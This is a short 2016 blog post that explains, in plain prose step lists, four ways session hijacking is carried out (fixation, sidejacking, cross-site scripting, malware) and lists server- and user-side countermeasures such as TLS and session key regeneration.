Wednesday, January 6, 2016

What is Session Hijacking ?


When a user authenticates himself in a web server, the session is maintained with a HTTP cookie. And the cookie is placed in the user's computer. Session Hijacking is an attack in which an attacker exploits a valid session of a user and gets unauthorized access to the web server for malicious purposes.






There are couple of methods using which a Session Hijacking is performed :


Session Fixation : In this attack, an attacker sets a user's session id to one known to him. And, when the user falls in trap and logs in to the server, the attacker impersonates him.

It normally follows these steps :

  • An attacker uses social engineering and sends the victim a link containing the predefined session id.
  • The victim clicks on the link and a log in screen pops up. When he logs on to the server, the server assigns that session id to the victim (because of vulnerabilities in the web application)
  • But, this session id is known to the attacker. So, the attacker now logs in to the server impersonating the victim.


Session Sidejacking : In this attack, the attacker mainly does packet sniffing and reads the network traffic between the victim's machine and the server to steal the session cookie.

It normally follows these steps :

  • The victim logs in to the server and starts communicating.
  • The attacker uses a packet sniffer and reads the network traffic between them.
  • The attacker steals the session cookie.
  • The attacker uses the same session cookie to log in to the server and impersonate the victim.


Cross-Site Scripting : In this attack, the attacker exploits a victim and inject client side scripts into web pages viewed by the victim to do malicious activities like steal sensitive information etc.


It normally follows these steps :

  • The attacker writes a script such that when a user is already logged in to the server and clicks on the link of the script, the session information is transferred to the attacker.
  • The attacker uses some social engineering and sends the link to the victim.
  • The victim logs in to the server and clicks on the link.
  • Session information placed in the cookie is transferred to the attacker.
  • The attacker now exploits the session information to log in to the server impersonating the victim.


Using Malware : Here, the attacker infects the victim's computer with a malware and then steals the session cookie.

Just to give an example :

  • The victim installs a software from an untrusted source.
  • The victim's computer is infected with a Browser Hijacker.
  • The malware changes the security settings of the attacker's browser.
  • When the victim logs in to the server, the malware steals the session cookie and transfers it to the attacker.
  • The attacker can now log in to the server impersonating the victim.



Countermeasures for Session Hijacking 

We can take couple of steps to prevent Session Hijacking.

  • Web applications should use SSL/TLS to transfer sensitive data. This will encrypt the data making it difficult for the attacker to steal session cookie or any other information.
  • Web applications should use very long random numbers as session key, so that it becomes difficult for the attacker to guess the session key and exploit that.
  • After a user authenticates himself, the server should regenerate the session key. It will become difficult for the attacker to guess the session key after the user logs in.
  • Web applications should use secondary checks like matching the IP address with that of the previous session etc, to increase the security.
  • Web applications can change the cookie with each and every request made by the user's computer. This will limit the attacker to a great extent.
  • And, users should always log out of the web applications, as soon as they are done using them.



So, this was another piece of information on a recent threat. Hope it helped you.

No comments:

Post a Comment